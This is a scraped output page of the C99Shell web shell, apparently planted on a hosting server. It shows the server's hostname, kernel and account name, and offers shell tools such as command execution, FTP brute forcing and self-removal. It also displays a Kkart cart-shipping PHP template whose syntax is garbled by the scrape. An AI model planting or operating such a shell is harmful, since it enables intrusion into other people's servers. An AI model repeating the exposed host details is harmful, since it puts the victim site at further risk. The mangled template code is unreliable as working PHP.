!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/var/softaculous/sitepad/editor/site-data/plugins/kkart-pro/templates/cart/   drwxr-xr-x
Free 292.52 GB of 429.69 GB (68.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     cart-shipping.php (4.2 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Shipping Methods Display
 *
 * In 2.1 we show methods per package. This allows for multiple methods per order if so desired.
 *
 * This template can be overridden by copying it to yourtheme/kkart/cart/cart-shipping.php.
 *
 * HOWEVER, on occasion Kkart will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see https://docs.kkart.com/document/template-structure/
 * @package Kkart\Templates
 * @version 3.6.0
 */

defined'ABSPATH' ) || exit;

$formatted_destination    = isset( $formatted_destination ) ? $formatted_destination KKART()->countries->get_formatted_address$package['destination'], ', ' );
$has_calculated_shipping  = ! empty( $has_calculated_shipping );
$show_shipping_calculator = ! empty( $show_shipping_calculator );
$calculator_text          '';
?>
<tr class="kkart-shipping-totals shipping">
    <th><?php echo wp_kses_post$package_name ); ?></th>
    <td data-title="<?php echo esc_attr$package_name ); ?>">
        <?php if ( $available_methods ) : ?>
            <ul id="shipping_method" class="kkart-shipping-methods">
                <?php foreach ( $available_methods as $method ) : ?>
                    <li>
                        <?php
                        
if ( count$available_methods ) ) {
                            
printf'<input type="radio" name="shipping_method[%1$d]" data-index="%1$d" id="shipping_method_%1$d_%2$s" value="%3$s" class="shipping_method" %4$s />'$indexesc_attrsanitize_title$method->id ) ), esc_attr$method->id ), checked$method->id$chosen_methodfalse ) ); // WPCS: XSS ok.
                        
} else {
                            
printf'<input type="hidden" name="shipping_method[%1$d]" data-index="%1$d" id="shipping_method_%1$d_%2$s" value="%3$s" class="shipping_method" />'$indexesc_attrsanitize_title$method->id ) ), esc_attr$method->id ) ); // WPCS: XSS ok.
                        
}
                        
printf'<label for="shipping_method_%1$s_%2$s">%3$s</label>'$indexesc_attrsanitize_title$method->id ) ), kkart_cart_totals_shipping_method_label$method ) ); // WPCS: XSS ok.
                        
do_action'kkart_after_shipping_rate'$method$index );
                        
?>
                    </li>
                <?php endforeach; ?>
            </ul>
            <?php if ( is_cart() ) : ?>
                <p class="kkart-shipping-destination">
                    <?php
                    
if ( $formatted_destination ) {
                        
// Translators: $s shipping destination.
                        
printfesc_html__'Shipping to %s.''kkart' ) . ' ''<strong>' esc_html$formatted_destination ) . '</strong>' );
                        
$calculator_text esc_html__'Change address''kkart' );
                    } else {
                        echo 
wp_kses_postapply_filters'kkart_shipping_estimate_html'__'Shipping options will be updated during checkout.''kkart' ) ) );
                    }
                    
?>
                </p>
            <?php endif; ?>
            <?php
        
elseif ( ! $has_calculated_shipping || ! $formatted_destination ) :
            if ( 
is_cart() && 'no' === get_option'kkart_enable_shipping_calc' ) ) {
                echo 
wp_kses_postapply_filters'kkart_shipping_not_enabled_on_cart_html'__'Shipping costs are calculated during checkout.''kkart' ) ) );
            } else {
                echo 
wp_kses_postapply_filters'kkart_shipping_may_be_available_html'__'Enter your address to view shipping options.''kkart' ) ) );
            }
        elseif ( ! 
is_cart() ) :
            echo 
wp_kses_postapply_filters'kkart_no_shipping_available_html'__'There are no shipping options available. Please ensure that your address has been entered correctly, or contact us if you need any help.''kkart' ) ) );
        else :
            
// Translators: $s shipping destination.
            
echo wp_kses_postapply_filters'kkart_cart_no_shipping_available_html'sprintfesc_html__'No shipping options were found for %s.''kkart' ) . ' ''<strong>' esc_html$formatted_destination ) . '</strong>' ) ) );
            
$calculator_text esc_html__'Enter a different address''kkart' );
        endif;
        
?>

        <?php if ( $show_package_details ) : ?>
            <?php echo '<p class="kkart-shipping-contents"><small>' esc_html$package_details ) . '</small></p>'?>
        <?php endif; ?>

        <?php if ( $show_shipping_calculator ) : ?>
            <?php kkart_shipping_calculator$calculator_text ); ?>
        <?php endif; ?>
    </td>
</tr>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0038 ]--